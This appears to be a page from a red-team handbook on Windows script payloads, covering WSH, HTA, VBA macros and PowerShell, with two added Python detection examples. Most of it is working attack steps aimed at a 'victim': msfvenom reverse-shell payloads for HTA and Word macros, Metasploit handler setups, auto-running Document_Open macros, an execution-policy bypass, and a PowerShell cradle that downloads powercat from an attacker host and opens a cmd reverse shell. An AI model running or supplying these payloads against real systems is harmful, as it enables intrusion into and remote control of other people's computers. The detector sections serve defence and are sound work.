handbook/tools/4.Exploitation/Shell-and-Reverse-Shell/1.Payloads-Windows-and-Linux/Windows/Macros Payloads (MS World, Excel, ...).md


2024-08-30 23:07:22 +00:00
## Why Use Macro Payloads?
As security measures become more robust in organizations, executing payloads within controlled environments becomes increasingly challenging for red teamers. Since **.exe** files are often blocked or monitored, alternative techniques such as built-in Windows scripting technologies are used. In this context, this task delves into some of the popular and effective scripting techniques, including WSH, HTA, VBA, and PSH, used by red teamers to execute payloads.
- Bypassing .exe Monitoring using WSH, HTA, VBA, PSH
## Windows Scripting Host (WSH)
Windows Scripting Host is a Windows-native engine, exposed as cscript.exe (for command-line scripts) and wscript.exe (for UI scripts), that executes Microsoft Visual Basic Scripts (VBScript), including .vbs and .vbe files. For more information about VBScript, please visit [here](https://en.wikipedia.org/wiki/VBScript). It is important to note that the VBScript engine on a Windows operating system runs and executes applications with the same level of access and permission as a regular user; therefore, it is useful for red teamers.
**Create the code in the vbs or txt file**
- Specify the location of the executable we want to launch
```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
```
- Exceptions (some apps are in the default path, so there is no need to provide the full executable location.)
```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run "cmd.exe"
```
**Launch the file**
```shell-session
# Launch the vbs script from vbs file
c:\Windows\System32>wscript c:\Users\thm\Desktop\payload.vbs
c:\Windows\System32>cscript.exe c:\Users\thm\Desktop\payload.vbs
# Launch the vbs script from a .txt file
c:\Windows\System32>wscript /e:VBScript c:\Users\thm\Desktop\payload.txt
```
More information about VBScript here ---> https://en.wikipedia.org/wiki/VBScript
## An HTML Application (HTA)
HTA stands for "HTML Application." It allows you to create a downloadable file that carries all the information regarding how it is displayed and rendered. HTML Applications, also known as HTAs, are dynamic HTML pages containing JScript and VBScript. The LOLBINS (Living-off-the-land Binaries) tool mshta is used to execute HTA files. It can be executed by itself or automatically from Internet Explorer.
**Reverse Shell**
MSFvenom -> Using hta (HTML)
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=1234 -f hta-psh -o exploit.hta
```
- Let the victim open the following exploit.hta from Microsoft Edge (this will automatically run the HTML/HTA element and give back a reverse shell)
- More information ---> [TryHackMe Module](https://tryhackme.com/room/weaponization) (Section An HTML Application - HTA)
Metasploit -> Using hta (HTML)
```
use exploit/windows/misc/hta_server
set LHOST IP
set LPORT 1234
set SRVHOST SAME-IP
set payload windows/meterpreter/reverse_tcp
exploit
```
- Let the victim open the following exploit.hta from Microsoft Edge (this will automatically run the HTML/HTA element and give back a reverse shell) --> Using a Python server, for example
- More information ---> [TryHackMe Module](https://tryhackme.com/room/weaponization) (Section An HTML Application - HTA)
## Visual Basic for Application (VBA) - Macros
VBA stands for Visual Basic for Applications, a programming language by Microsoft implemented for Microsoft applications such as Microsoft Word, Excel, PowerPoint, etc. VBA programming allows automating tasks of nearly every keyboard and mouse interaction between a user and Microsoft Office applications. 
Macros are Microsoft Office applications that contain embedded code written in a programming language known as Visual Basic for Applications (VBA). It is used to create custom functions to speed up manual tasks by creating automated processes. One of VBA's features is accessing the Windows Application Programming Interface ([API](https://en.wikipedia.org/wiki/Windows_API)) and other low-level functionality. For more information about VBA, visit [here](https://en.wikipedia.org/wiki/Visual_Basic_for_Applications).
- Create/Run Macros (Microsoft Word)
First, we need to open the Visual Basic Editor by selecting View → Macros. The Macros window lets us create our own macro within the document.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5d617515c8cd8348d0b4e68f/room-content/5e12755e9b891865c6ef07e25047060b.png)
- Select a name, change "Macros in" to "Document1" and click Create
Finally, run the macro with F5 or Run → Run Sub/UserForm.
```VBA
Sub Document_Open()
HACKING
End Sub
Sub AutoOpen()
HACKING
End Sub
Sub HACKING()
MsgBox ("You got Hack!")
End Sub
```
It is important to note that to make the macro work, we need to save the document in a macro-enabled format such as .doc or .docm. Now let's save the file as Word 97-2003 Template, where macros are enabled, by going to File → Save Document1, choosing Save as type → Word 97-2003 Document, and finally saving.
![](https://tryhackme-images.s3.amazonaws.com/user-uploads/5d617515c8cd8348d0b4e68f/room-content/a5e35b7436173da709dae5695c34d4f9.png)
Let's close the Word document that we saved. If we reopen the document file, Microsoft Word will show a security message indicating that macros have been disabled and give us the option to enable them. Once they are enabled, the payload will be executed.
- Second Example with calc.exe
```VBA
Sub PoC()
Dim payload As String
payload = "calc.exe"
CreateObject("Wscript.Shell").Run payload,0
End Sub
```
- To explain the code in detail: with `Dim payload As String`, we declare the payload variable as a string using the Dim keyword. With `payload = "calc.exe"` we specify the payload name, and finally with `CreateObject("Wscript.Shell").Run payload` we create a Windows Scripting Host (WSH) object and run the payload. Note that if you want to rename the function, then you must call the new function name in the AutoOpen() and Document_Open() functions too.
**It is important to mention that we can combine VBAs with previously covered methods, such as HTAs and WSH. VBAs/macros by themselves do not inherently bypass any detections.**
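The note above is what defenders rely on: a macro that calls `CreateObject("Wscript.Shell").Run` makes the Office process the parent of whatever it launches, and the `wscript /e:VBScript payload.txt` trick from the WSH section leaves an engine override in the command line. The following added example (not part of the original handbook) triages process-creation events for both signals; the field names follow Sysmon Event ID 1, while the finding names and sample events are constructed for illustration.

```python
import ntpath
import shlex

# Office applications whose macros can start child processes.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Script hosts and shells covered on this page.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
WSH_HOSTS = {"wscript.exe", "cscript.exe"}
# Extensions WSH maps to an engine without an explicit /e: override.
WSH_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf"}


def exe_name(path):
    """Lower-cased file name of a Windows path, whatever OS the analysis runs on."""
    return ntpath.basename(path.strip('"')).lower()


def triage(event):
    """Return the findings (hypothetical names) for one process-creation event."""
    findings = []
    child, parent = exe_name(event["Image"]), exe_name(event["ParentImage"])
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        findings.append("office-spawned-script-host")
    if child in WSH_HOSTS:
        try:
            args = shlex.split(event["CommandLine"], posix=False)[1:]
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            args = event["CommandLine"].split()[1:]
        args = [a.strip('"') for a in args]
        override = any(a.lower().startswith(("/e:", "//e:")) for a in args)
        scripts = [a for a in args if not a.startswith("/")]
        # An engine override on a file WSH would not normally run, e.g. a .txt
        if override and any(ntpath.splitext(s)[1].lower() not in WSH_EXTENSIONS for s in scripts):
            findings.append("wsh-engine-override")
    return findings


# Constructed sample events (Sysmon Event ID 1 style fields).
EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -ex bypass -File something.ps1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript /e:VBScript c:\Users\thm\Desktop\payload.txt"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Scripts\logon.vbs"'},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(triage(ev), ev["CommandLine"])
```

A macro that runs shellcode inside the Office process creates no child process, so this lineage check needs to be paired with macro-blocking policy and in-process telemetry.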
**HTA Reverse Connection (Using Microsoft Word Macros)**
MSFvenom
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=1234 -f vba
```
- Insert the output in the Macros
- Change Workbook_Open() to Document_Open() ---> Workbook_Open() is for Excel sheets
Setup Meterpreter reverse shell
```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST IP
set LPORT 1234
exploit
```
- Now wait for the target to open the document
- More information ---> [TryHackMe Module](https://tryhackme.com/room/weaponization) (Visual Basic for Application - VBA)
## PowerShell (PSH)
PowerShell is an object-oriented programming language executed from the Dynamic Language Runtime (DLR) in .NET with some exceptions for legacy uses. Check out the TryHackMe room, [Hacking with PowerShell for more information about PowerShell](https://tryhackme.com/room/powershell).
Bypass the execution policy (helps run PowerShell scripts)
```powershell
Get-ExecutionPolicy   # Check the current policy
powershell -ex bypass
powershell -ex bypass -File something.ps1
```
Reverse shell using powercat
```
git clone https://github.com/besimorhino/powercat.git
```
- Open a Python server (no need to download it on the target machine, since the "Launch Powercat" command will do it automatically)
Launch Netcat
```
nc -lvp 1337
```
Launch Powercat (target)
```
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKBOX_IP:8080/powercat.ps1');powercat -c ATTACKBOX_IP -p 1337 -e cmd"
```
- More information ---> [TryHackMe Module](https://tryhackme.com/room/weaponization) (PowerShell - PSH)
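Both PowerShell command lines in this section are visible in process-creation logs. The following added example (not part of the original handbook) flags them, including the abbreviated spellings of `-ExecutionPolicy` that powershell.exe accepts (`-ep`, or any prefix from `-ex` upward); the finding names, the choice to treat `Unrestricted` like `Bypass`, and the last two sample lines are assumptions made for illustration.

```python
import re
import shlex

# IEX / Invoke-Expression applied to WebClient.DownloadString, in either order.
CRADLE = re.compile(
    r"\b(iex|invoke-expression)\b.*downloadstring"
    r"|downloadstring.*\|\s*(iex|invoke-expression)\b",
    re.IGNORECASE | re.DOTALL,
)
WEAK_POLICIES = {"bypass", "unrestricted"}  # assumption: both treated as weak


def is_execution_policy_flag(token):
    """True for -ExecutionPolicy in any accepted spelling: -ep, or a prefix of
    'executionpolicy' at least two letters long. '-e' and '-enc' select
    EncodedCommand and do not match."""
    if len(token) < 3 or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name == "ep" or "executionpolicy".startswith(name)


def tokenize(command_line):
    """Split a Windows command line; fall back to whitespace on unbalanced quotes."""
    try:
        return shlex.split(command_line, posix=False)
    except ValueError:
        return command_line.split()


def analyze(command_line):
    """Return the sorted finding names (hypothetical) for one command line."""
    findings = set()
    tokens = tokenize(command_line)
    for flag, value in zip(tokens, tokens[1:]):
        if is_execution_policy_flag(flag) and value.strip("'\"").lower() in WEAK_POLICIES:
            findings.add("execution-policy-bypass")
    if CRADLE.search(command_line):
        findings.add("download-and-execute")
    return sorted(findings)


# The first two lines are the commands shown on this page; the rest are constructed.
SAMPLES = [
    "powershell -ex bypass -File something.ps1",
    "powershell -c \"IEX(New-Object System.Net.WebClient).DownloadString("
    "'http://ATTACKBOX_IP:8080/powercat.ps1');powercat -c ATTACKBOX_IP -p 1337 -e cmd\"",
    "powershell.exe -EXEC Unrestricted -NoProfile",
    r"powershell -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line), line[:60])
```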